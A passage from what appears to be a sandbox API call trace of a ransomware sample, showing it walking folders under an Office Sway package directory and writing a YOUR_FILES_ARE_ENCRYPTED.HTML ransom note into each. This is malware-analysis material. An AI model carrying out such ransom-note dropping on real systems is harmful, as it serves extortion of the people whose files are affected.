ftLastWriteTime.dwLowDateTime=0x61a84013, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d278, dwReserved1=0x62ec40, cFileName="..", cAlternateFileName="")) returned 0 [0116.913] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.913] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0116.913] GetProcessHeap () returned 0x600000 [0116.913] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.913] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.sway_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.913] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.914] CloseHandle (hObject=0x214) returned 1 [0116.914] GetProcessHeap () returned 0x600000 [0116.914] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.914] GetProcessHeap () returned 0x600000 [0116.914] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.914] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x61a84013, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a84013, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61a84013, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0116.914] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.915] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetHistory") returned 99 [0116.915] GetProcessHeap () returned 0x600000 [0116.915] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.915] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetHistory" [0116.915] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0116.915] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x61a84013, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a84013, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61a84013, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d278, dwReserved1=0x62ec40, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.915] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x61a84013, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a84013, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61a84013, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d278, dwReserved1=0x62ec40, cFileName="..", cAlternateFileName="")) returned 1 [0116.915] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x61a84013, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a84013, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61a84013, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d278, dwReserved1=0x62ec40, cFileName="..", cAlternateFileName="")) returned 0 [0116.915] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0116.915] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0116.915] GetProcessHeap () returned 0x600000 [0116.915] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.915] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.sway_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.916] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.917] CloseHandle (hObject=0x214) returned 1 [0116.919] GetProcessHeap () returned 0x600000 [0116.919] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.919] GetProcessHeap () returned 0x600000 [0116.919] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.920] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61a5dc2a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a5dc2a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61a5dc2a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="Temp", cAlternateFileName="")) returned 1 [0116.920] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.920] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\Temp") returned 92 [0116.920] GetProcessHeap () returned 0x600000 [0116.920] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.921] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\Temp" [0116.921] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\Temp\\*" [0116.921] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61a5dc2a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a5dc2a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61a5dc2a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d278, dwReserved1=0x62ec40, cFileName=".", cAlternateFileName="")) returned 0x626778 [0116.921] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61a5dc2a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a5dc2a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61a5dc2a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d278, dwReserved1=0x62ec40, cFileName="..", cAlternateFileName="")) returned 1 [0116.921] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61a5dc2a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a5dc2a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61a5dc2a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315d278, dwReserved1=0x62ec40, cFileName="..", cAlternateFileName="")) returned 0 [0116.921] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0116.921] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0116.922] GetProcessHeap () returned 0x600000 [0116.922] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.sway_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.922] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0116.923] CloseHandle (hObject=0x214) returned 1 [0116.923] GetProcessHeap () returned 0x600000 [0116.923] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.923] GetProcessHeap () returned 0x600000 [0116.923] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0116.923] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61a5dc2a, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61a5dc2a, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61a5dc2a, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="Temp", cAlternateFileName="")) returned 0 [0116.924] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.924] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0116.924] GetProcessHeap () returned 0x600000 [0116.924] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.924] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.sway_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.924] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.925] CloseHandle (hObject=0x320) returned 1 [0116.925] GetProcessHeap () returned 0x600000 [0116.925] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.925] GetProcessHeap () returned 0x600000 [0116.925] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.926] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x618e067f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x618e067f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x618e067f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0116.926] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.926] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AppData") returned 92 [0116.926] GetProcessHeap () returned 0x600000 [0116.926] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.927] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AppData" [0116.927] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AppData\\*" [0116.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x618e067f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x618e067f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x618e067f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName=".", cAlternateFileName="")) returned 0x626978 [0116.927] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x618e067f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x618e067f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x618e067f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 1 [0116.927] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x618e067f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x618e067f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x618e067f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 0 [0116.927] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0116.927] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0116.927] GetProcessHeap () returned 0x600000 [0116.927] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.sway_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.928] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.929] CloseHandle (hObject=0x320) returned 1 [0116.929] GetProcessHeap () returned 0x600000 [0116.929] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.929] GetProcessHeap () returned 0x600000 [0116.929] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.930] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6182197f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6182197f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6182197f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0116.930] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.930] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\LocalCache") returned 95 [0116.930] GetProcessHeap () returned 0x600000 [0116.930] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.931] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\LocalCache" [0116.931] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\LocalCache\\*" [0116.931] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6182197f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6182197f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6182197f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName=".", cAlternateFileName="")) returned 0x626838 [0116.931] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6182197f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6182197f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6182197f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 1 [0116.931] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6182197f, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x6182197f, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x6182197f, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ece2, dwReserved1=0x62ec38, cFileName="..", cAlternateFileName="")) returned 0 [0116.931] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0116.931] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0116.931] GetProcessHeap () returned 0x600000 [0116.931] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.932] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Office.Sway_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.office.sway_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0116.932] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.933] CloseHandle (hObject=0x320) returned 1 [0116.933] GetProcessHeap () returned 0x600000 [0116.933] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.933] GetProcessHeap () returned 0x600000 [0116.933] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.934] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x61716890, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x61716890, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x61716890, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, 